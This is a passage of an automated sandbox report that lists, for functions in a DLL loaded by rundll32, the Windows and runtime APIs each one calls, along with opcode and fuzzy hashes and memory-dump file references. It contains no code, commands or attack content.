                                                                                                          • Opcode ID: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction ID: 7117f4333b49b93e9e103224ba76a384f5f6927333c7ffee97ba62033829b48c
                                                                                                          • Opcode Fuzzy Hash: 8904d22b2e9766e214ab266f9aec4827302d519ac8e5ca81d82e01921d4caf04
                                                                                                          • Instruction Fuzzy Hash: 3D110134500761EFD714CF99D988AAAB7F8FF00399F51C429E84283550D770ED58DBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 10024E1A
                                                                                                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                                                                                                          • __CxxThrowException@8.LIBCMT ref: 10024E50
                                                                                                          • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,8007000E,00000000,00000000,00000000,?,8007000E,1004DCF4,00000004,1000166C,8007000E), ref: 10024E7B
                                                                                                            • Part of subcall function 10023B77: __cftof.LIBCMT ref: 10023B88
                                                                                                          • LocalFree.KERNEL32(8007000E,8007000E), ref: 10024EA4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow__cftof_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1808948168-0
                                                                                                          • Opcode ID: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
                                                                                                          • Instruction ID: b82dd79aa3f9a22217a6a5774d94273f1735641f27abfa85c715a235195ff0cc
                                                                                                          • Opcode Fuzzy Hash: a99d70be1c0dcc840c7ce1049e047e71ac8799dea147b88372324e332874e07f
                                                                                                          • Instruction Fuzzy Hash: 2711C6B1604249BFEF01DFA4DC81DAE3BA9FF08350F628529F619CB1A1DB319950CB50
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 100217B5
                                                                                                            • Part of subcall function 1002299D: __EH_prolog3.LIBCMT ref: 100229A4
                                                                                                          • __strdup.LIBCMT ref: 100217D7
                                                                                                          • GetCurrentThread.KERNEL32 ref: 10021804
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 1002180D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                          • String ID:
                                                                                                          • API String ID: 4206445780-0
                                                                                                          • Opcode ID: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction ID: 63c4b4d8ed515ebd67a2d3fac6e93b486822e3c8ffac095a61f99a1b17b282e6
                                                                                                          • Opcode Fuzzy Hash: 81573f6a70f85e6e6b71bd66fb05b0a7947cee5f3eccb4cfcc9ed85a086636bb
                                                                                                          • Instruction Fuzzy Hash: EC217DB8801B408EC321DF6A958124AFBF4FFA4600F50891FE5AAC7A22DBB4A441CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$Capture
                                                                                                          • String ID:
                                                                                                          • API String ID: 1665607226-0
                                                                                                          • Opcode ID: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction ID: 9d500238946ec194ad8ffa17e766443115c43433aa0eeb43828134f684b4c91a
                                                                                                          • Opcode Fuzzy Hash: 088ca0eca7ffd53ce47653328526b22f7a75d7299b8dffa12b2224c673d87500
                                                                                                          • Instruction Fuzzy Hash: 8A0175713402557BDA205B629CCDF9B3E7AEBCAF50F510478F6089A0A7CAA14800D620
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1002AC0E
                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 1002AC17
                                                                                                          • swprintf.LIBCMT ref: 1002AC34
                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002AC45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClosePrivateProfileStringValueWriteswprintf
                                                                                                          • String ID:
                                                                                                          • API String ID: 22681860-0
                                                                                                          • Opcode ID: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction ID: b3e5ac37a67a2c34724f7244494befea3428c85a23c18ad1ae006fcf60cdee60
                                                                                                          • Opcode Fuzzy Hash: c84d023a091e3481915df690cb6fa3c091d1dd2ebdb2df30426c6b2c34bdf920
                                                                                                          • Instruction Fuzzy Hash: C901ED76500218ABDB10DF688D85FAF77ACEB49714F51082AFA01E3141DB74ED0487A8
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027E8D
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027ECC
                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 10027EEA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window
                                                                                                          • String ID:
                                                                                                          • API String ID: 2353593579-0
                                                                                                          • Opcode ID: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
                                                                                                          • Instruction ID: 7c1aa0b4fd0438a3880c8a8454d512b9e221987d8156c76486bb18807498cd50
                                                                                                          • Opcode Fuzzy Hash: afb69f6388361ddcc73f1cca2ae2c50509cd01f1d16e133e3ebac848732dfc51
                                                                                                          • Instruction Fuzzy Hash: 8101D33640062ABBDF139FA1AD05E9F3B6AFF492A0F424054FE1851060D736C961EBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                          • String ID:
                                                                                                          • API String ID: 3016257755-0
                                                                                                          • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction ID: 1693f95a625ffde70028128af171decd196e1ba2c6c978d497889c3db2691634
                                                                                                          • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                                          • Instruction Fuzzy Hash: 85117E3680054ABFCF139E80CC028EE3F62FB09299F548415FF1958032C736D9B1AB81
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32 ref: 10027846
                                                                                                          • GetTopWindow.USER32(00000000), ref: 10027859
                                                                                                            • Part of subcall function 10027839: GetWindow.USER32(00000000,00000002), ref: 100278A0
                                                                                                          • GetTopWindow.USER32(?), ref: 10027889
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Item
                                                                                                          • String ID:
                                                                                                          • API String ID: 369458955-0
                                                                                                          • Opcode ID: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction ID: f10d52d962ac960512d7384eec108a680d17f64428226a36a785d2fcb99e30ea
                                                                                                          • Opcode Fuzzy Hash: 3cb82c9a8c8603e496fbf3d62de3cfdf58aa9b4925ce369bf6021e639fee71c7
                                                                                                          • Instruction Fuzzy Hash: F301A23618166ABBCB229F51AC08E8F3A99FF417E0F814021FD0C91111DF31D911D6E1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • FindResourceA.KERNEL32(?,?,000000F0), ref: 1002A27D
                                                                                                          • LoadResource.KERNEL32(?,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A289
                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A296
                                                                                                          • FreeResource.KERNEL32(00000000,00000000,?,?,?,?,?,10023139,?,?,1001DF61), ref: 1002A2B2
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$FindFreeLoadLock
                                                                                                          • String ID:
                                                                                                          • API String ID: 1078018258-0
                                                                                                          • Opcode ID: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction ID: f3c4c51c49c486de2effa8659e681593a38c79611994fd5387b39b2d60b42ad5
                                                                                                          • Opcode Fuzzy Hash: feba8fe24ac97258290d34300adbce18e9849086dee679fc7f85b56fb59f0c30
                                                                                                          • Instruction Fuzzy Hash: B5F0C237200316BBD7019FAD9DC4A6B77ADEF866A17524038FE09D3210DE71DD448AB4
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memsethtonsinet_addrsendto
                                                                                                          • String ID:
                                                                                                          • API String ID: 1158618643-0
                                                                                                          • Opcode ID: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction ID: 60f6b611a07b9dfdfd37c1fffb937be7e3926c5419f3fbf29161148c0f489d21
                                                                                                          • Opcode Fuzzy Hash: c3eaa792e2cc8573930c6e3819606380beb20a92460ab2a72e807829517de2d8
                                                                                                          • Instruction Fuzzy Hash: 7A015E75900208ABDB00DFA4C986BBF77B8FF48700F504459F90597281E770AA10DBA1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                                                                                                          • GetActiveWindow.USER32 ref: 100235AF
                                                                                                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,00FD6546), ref: 100235BD
                                                                                                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,00FD6546), ref: 100235D9
                                                                                                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ActiveEnable$FreeResource
                                                                                                          • String ID:
                                                                                                          • API String ID: 253586258-0
                                                                                                          • Opcode ID: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction ID: 11aa7c219ea7ea27b38022f450b92876966fee3fb2bcd7a89944b049f6e30275
                                                                                                          • Opcode Fuzzy Hash: 2c836dbf06692eee7363ec98f3d2861cbecdd6f5195fecbca41b8321f8fae3dc
                                                                                                          • Instruction Fuzzy Hash: 83F01934900B28CBDF12EF64D9855AD77B1FF88B02B900425E446B2161CB326E80CA65
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • __getptd.LIBCMT ref: 100337DB
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 100337F2
                                                                                                          • __amsg_exit.LIBCMT ref: 10033800
                                                                                                          • __lock.LIBCMT ref: 10033810
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                          • String ID:
                                                                                                          • API String ID: 3521780317-0
                                                                                                          • Opcode ID: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction ID: dae39449bd8c003bde3e62b30ea038717af1cc855304bc2085dea34c93cae8e5
                                                                                                          • Opcode Fuzzy Hash: 56a1e1e41ab0af4027642382f4b576c173bb85e7d626fa8461ae6f1c5f148875
                                                                                                          • Instruction Fuzzy Hash: 72F06D7E909700AFE362DB74844674A37E0EF00762F118619B4419F3A1CF34B900CA91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10021762
                                                                                                          • PathFindExtensionA.SHLWAPI(?), ref: 10021778
                                                                                                            • Part of subcall function 100214CB: __EH_prolog3_GS.LIBCMT ref: 100214D5
                                                                                                            • Part of subcall function 100214CB: GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                                                                                                            • Part of subcall function 100214CB: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                                                                                                            • Part of subcall function 100214CB: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                                                                                                            • Part of subcall function 100214CB: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3_HandlePath
                                                                                                          • String ID: %s%s.dll
                                                                                                          • API String ID: 1311856149-1649984862
                                                                                                          • Opcode ID: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction ID: cb1c0cb3582a3260588f521687d4e0582820240ed98e8e3d3c47ebba61cd8817
                                                                                                          • Opcode Fuzzy Hash: 06773c07019d6f4b52aa5f2187269cd07d01a6017d615c8e4409f9f105a9a11d
                                                                                                          • Instruction Fuzzy Hash: DA01D1759002289FDB10DB28DD45AEF77FCEB85700F4104A6E505E7150EA70AE04CBA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030489
                                                                                                            • Part of subcall function 10030483: __getptd.LIBCMT ref: 10030499
                                                                                                          • __getptd.LIBCMT ref: 1003786D
                                                                                                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
                                                                                                            • Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780
                                                                                                          • __getptd.LIBCMT ref: 1003787B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 803148776-1018135373
                                                                                                          • Opcode ID: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction ID: 9bdde97464bd0678537997cb56ba83c365607814a506e3d314dec82bc4d239b5
                                                                                                          • Opcode Fuzzy Hash: 51da8c13634b056fff6b854f5948755b110b34fcd4bcc67fefb372d20441b29d
                                                                                                          • Instruction Fuzzy Hash: 5C014B38841245CECB36CFA0D8446AEB7F6FF08253F51442EE0495EAA1DF30EA81CB51
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,1000308E,00000000,00000000), ref: 10002B05
                                                                                                          • SetLastError.KERNEL32(0000007E), ref: 10002B47
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 4100373531-0
                                                                                                          • Opcode ID: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction ID: 796d6741741126c51599b2b906ad2ab7a2c15db3fbae67425d52538266fc70d6
                                                                                                          • Opcode Fuzzy Hash: 97caa88e84ccd89aa93ae28ac998ff8c0d132747f048963a4391c92f1473f43e
                                                                                                          • Instruction Fuzzy Hash: C38182B4A00209DFEB04CF94C981A9EB7B1FF88354F248559E819AB355D735EE82CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                          • InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                          • LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
